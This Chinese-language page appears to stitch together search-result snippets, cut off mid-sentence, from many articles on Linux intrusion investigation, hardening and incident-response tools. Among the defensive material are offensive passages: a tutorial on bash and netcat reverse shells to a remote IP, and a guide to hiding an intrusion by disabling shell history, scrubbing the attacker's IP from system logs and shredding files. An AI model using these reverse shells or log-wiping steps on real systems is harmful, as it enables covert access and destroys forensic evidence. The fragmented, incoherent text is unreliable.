Linux入侵排查时安全工具整理 近期有协助网友排查一次Linux云主机中了挖矿病毒的情况: ?...(图片可放大查看) 溯源排查基本步骤可以参考这篇经典文章 《Linux 应急响应入门:入侵排查应该这样做》 网上类似这样文章我也收藏了一些,都总结得非常不错 1、《linux 溯源命令集合-主机层(持续更新...Linux入侵时我们也可以使用一些自动化的安全工具协助排查溯源 并进行安全加固 之前也有发过CentOS安全加固的几篇文章 【分享】非常全面的CentOS7系统安全检测和加固脚本 CentOS7一键安全加固及系统优化脚本...Linux安全工具 1、GScan GScan程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。...rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。
1、物理层安全策略 2、网络层安全策略 3、应用层安全策略 4、入侵检测系统配置 5、LINUX备份与安全 信息安全:保障数据完整性和可用性 软件安全:软件未被篡改 用户访问安全:用户经过认证和授权...网络安全 1、物理安全 -服务器采用双电源 -独立机柜 -机柜加锁 -操作完推出shell -异地容灾 2、网络层安全 -不需要外网的,不外网 -iptables配置 firewall...配置 -交换机路由器的acl规则 -nmap -sS ip -p1-65535 --max-retries 1 --host-timeout 10m 3、应用层安全措施 -密码安全:修改默认密码...:all,禁止root, -PAM模块增加系统安全性 image.png image.png -web服务器安全:Modsecurity 添加到apache nginx iis里。...image.png -数据库安全 4、入侵检测系统:OSSEC -文件一致性检查 -日志监控 -rootkit检查 image.png image.png image.png image.png
那么既然是入侵检测,首先要判断的是服务器是否被入侵,必须排除是管理员操作不当导致的问题,因此入侵检测的第一项工作就是询问管理员服务器的异常现象,这对之后入侵类型的判断非常重要。 ? ...注:linux设置空口令:passwd -d username 四、检查进程 一般被入侵的服务器都会运行一些恶意程序,或是挖矿程序,或者DDOS程序等等,如果程序运行着,那么通过查看进程可以发现一些信息...我们也可以通过检查服务器上是否留有入侵者放置的网站后门木马,以此判断黑客是否通过web应用入侵到服务器。...lrzsz 如果ssh连接的客户端为xshell等,可以安装lrzsz命令(putty无法使用) 使用: 上传文件到linux,rz;下载linux文件,sz 文件名。...本文总结的都是一些Linux入侵检测最基础的命令,至于怎么用好这些命令,需要结合实际情况,主要还是看经验。
0x00 审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出。...last -x reboot 只针对登录 使用-d参数,并且参数后不用跟任何选项 last -d 显示错误的登录信息 lastb 查看当前登录情况 who、w 0x01 日志查看 在Linux...(utmp、wtmp日志文件是多数Linux日志子系统的关键,它保存了用户登录进入和退出的记录。...0x02 用户查看 Linux不同的用户,有不同的操作权限,但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录; 查看详细 注:linux...*:查看cron文件是变化的详细 ls /var/spool/cron/ 检查后门 对于linux的后门检查,网络上有一些公开的工具,但是在不使用这些工具的前提时,我们可以通过一些命令来获取一些信息。
二、入侵分析 本次捕获案例的入侵流程与以往相比,没有特殊的地方,也是利用通用漏洞入侵服务器并获得相关权限,从而植入挖矿程序再进行隐藏。...在变更文件里可以看到一些挖矿程序,同时 /etc/ld.so.preload 文件的变更需要引起注意,这里涉及到 Linux 动态链接库预加载机制,是一种常用的进程隐藏方法,而 top 等命令都是受这个机制影响的...在 Linux 操作系统的动态链接库加载过程中,动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库...——段落引自《警惕利用 Linux 预加载型恶意动态链接库的后门》 通过查看文件内容,可以看到加载一个 .so 文件:/usr/local/lib/libjdk.so ?...云鼎实验室主要关注腾讯云安全体系建设,专注于云上网络环境的攻防研究和安全运营,以及基于机器学习等前沿技术理念打造云安全产品。
1. 检查帐户 # less /etc/passwd # grep :0: /etc/passwd(检查是否产生了新用户,和UID、GID是0的用户) # ls...
大多是通过上传脚本文件,然后执行脚本开启一个端口,通过那个端口来执行shell命令去操作,这样会非常安全很难被察觉。...二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。
Linux入侵排查步骤 一:查看异常的进程 a、查看cpu占用最多的进程 运行top命令 交互式P键会根据CPU的占用大小进行排序 有的时候会遇到top之后cpu显示特别的低,但是服务器还特别的卡.../lastlog Last 列出截止目前登录过系统的用户信息 W 查看当前的登录账号信息 可以通过/var/log/secure文件 查看登录成功、失败等信息 六:查看最近一段时间被修改的文件 查找入侵时间点修改的文件...对外的异常链接 b、/etc/systemd/system/multi-user.target.wants 是否有服务的软连接 c、可以先kill -STOP $id 先禁止然后在进行排查 服务器要做好安全加固避免被入侵...a、定期安装系统补丁 b、安全组仅对外开放业务端口 c、定期做镜像、快照备份 d、不要安装来源不明软件 e、使用含有数字、大小写字母、特殊符号的密码
当Linux主机发生安全事件需要进行入侵排查时,一般可以使用常见的shell命令,通过分析主机的异常现象、进程端口、启动方式、可疑文件和日志记录等信息以确认主机是否被入侵。...在这里,结合工作中Linux安全事件分析处理办法,总结了Linux手工入侵排查过程中的分析方法。...---- 01、检查系统账号 从攻击者的角度来说,入侵者在入侵成功后,往往会留下后门以便再次访问被入侵的系统,而创建系统账号是一种比较常见的后门方式。...查询某个用户在系统上执行了什么命令 使用root用户登录系统,检查/home目录下的用户主目录的.bash_history文件 (2)默认情况下,系统可以保存1000条的历史命令,并不记录命令执行的时间,根据需要进行安全加固...secure:记录验证和授权方面的信息,只要涉及账号和密码的程序都会记录,比如SSH登录,su切换用户,sudo授权,甚至添加用户和修改用户密码都会记录在这个日志文件中 一般,我们需要重点去关注secure安全日志
在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。...HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 02、清除系统日志痕迹 Linux...'/自己的ip/'d /var/log/messages # 全局替换登录IP地址: sed -i 's/192.168.166.85/192.168.1.1/g' secure 03、清除web入侵痕迹...(1)shred命令 实现安全的从硬盘上擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数。...dd if=/dev/zero of=要删除的文件 bs=大小 count=写入的次数 (3)wipe Wipe 使用特殊的模式来重复地写文件,从磁性介质中安全擦除文件。
libtermcap.so.2 => /lib/libtermcap.so.2 (0x40022000) libc.so.6 => /lib/tls/libc.so.6 (0x42000000) /lib/ld-linux.so....2 => /lib/ld-linux.so.2 (0x40000000) strace工具是一个调试工具,它可以显示出一个程序在执行过程中的所有系统调用, [root@rh9bk root]# strace...open("/root/.telnetrc", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/terminfo/l/linux...restart c.在192.168.20.163安装kiwisyslogd d.远程登陆,故意输入错误密码,可看到日志主机上马上有报警,也可以tcpdump port 514观察 17 如果知道黑客是0927入侵的.../dev/sda of=/dev/sdb bs=1024 分区复制 测试过 dd if=/dev/sda1 of=/abc bs=1024 这里是保存在了根分区,用mount查看是sda2 启动另一个linux
Linux高级入侵检测平台- AIDE AIDE(Advanced Intrusion Detection...Environment)在linux下"一切皆是文件"这是一款针对文件和目录进行完整性对比检查的程序 如何工作 这款工具年纪也不小了,相对来同类工具Tripwire说,它的操作也更加简单。...这个系统主要用于运维安全检测,AIDE会向管理员报告系统里所有的恶意更迭情况。...-eq 0 ];then cat $log| /bin/mail -s "安全报告 IP:$(ip add |grep global |awk '{print $2}'|cut -d / -f 1...fi find /home/ -name "aide-report-*.txt" -mtime +60 -exec rm -rf {} \; #删除60天前日志 循环脚本(防止入侵者发现计划任务) /
RKHunter是Linux系统平台下的一款开源入侵检测工具 特点 (1)安装便捷,运行快速 (2)扫描范围全,能够检测各种已知的rootkit特征码、端口扫描、常用程序文件的变动情况检查 主要功能
我发现了一个网站,于是常规入侵。
Linux系统下基本命令: 要区分大小写 系统 # uname -a # 查看内核/操作系统/CPU信息 # head -n 1 /etc/issue # 查看操作系统版本 # cat /proc/cpuinfo...# chkconfig --list # 列出所有系统服务 # chkconfig --list | grep on # 列出所有启动的系统服务 程序 # rpm -qa # 查看所有安装的软件包 入侵
0x00 前言 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程...针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路。...0x01 入侵排查思路 一、账号安全 基本使用: 1、用户信息文件/etc/passwd root:x:0:0:root:/root:/bin/bash account:password:UID:GID...这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件 /var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用...Bypass About Me 一个网络安全爱好者,对技术有着偏执狂一样的追求。致力于分享原创高质量干货,包括但不限于:渗透测试、WAF绕过、代码审计、安全运维。
Web 信息收集1(指纹识别) 我们的官方群:241655998 Telnet xxx 80 2.curl --head url 准确的IIS版本,会帮助我们更...
可以以物理入侵(不是远程入侵)的方式控制汽车。...(1)仪表系统又叫仪表盘IC(Instrument Cluster),是位于方向盘正前方的一个8英寸的屏幕,运行Ubuntu Linux操作系统,处理器是NVIDIA Tegra3,如图2所示。...图2 被拆下来的仪表 (2)中央信息显示模块CID(Central Information Display),就是汽车中央的17英寸大屏,运行Ubuntu Linux操作系统,处理器是NVIDIA Tegra4...图5 Model S的网络架构 这种将汽车的控制器网络与娱乐信息系统进行隔离的网络架构是非常优秀的设计,因为娱乐信息系统有丰富的网络连接,当黑客入侵娱乐系统后还需要通过网关才能控制汽车的关键部件[例如...下载下来的固件约600多兆,是一个SquashFS文件系统,解压后尝试寻找私钥和Shadow文件(Linux系统里存储用户名和密码哈希等相关信息的文件),结果找到了IC的Shadow文件。
(前提是没有连接次数限制,超时什么的)Kail linux中自带很多强大的密码爆破工具,比如我比较喜欢的Hydra。...但是同样出色的Burpsuite也是作为安全工作者来说必不可少的工具,Burpsuite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务、请求的拦截和修改,扫描web应用程序漏洞、以暴力破解...安装成功后如果提示需要burpsuite license key我的解决办法是再burpsuite的安装目录下创建cacert.der的安全证书就可以不用 license key正常使用了。
目录 排查思路 深入分析,查找入侵原因 检查恶意进程及非法端口 检查恶意程序和可疑启动项 检查第三方软件漏洞 Part2运行进程排查 Part3端口开放检查 Part4检查主机服务 Part5检查历史命令...Part6查看计划任务 Part7查看制定文件夹七天内被修改过的文件 Part8扫描主机驱动程序 Part10日志排查 Part11登陆排查 Part12启动项排查 排查思路 深入分析,查找入侵原因.../var/log/userlog 记录所有等级用户信息的日志 · /var/log/cron 记录crontab命令是否被正确的执行 · /var/log/xferlog(vsftpd.log) 记录Linux
领取专属 10元无门槛券
手把手带您无忧上云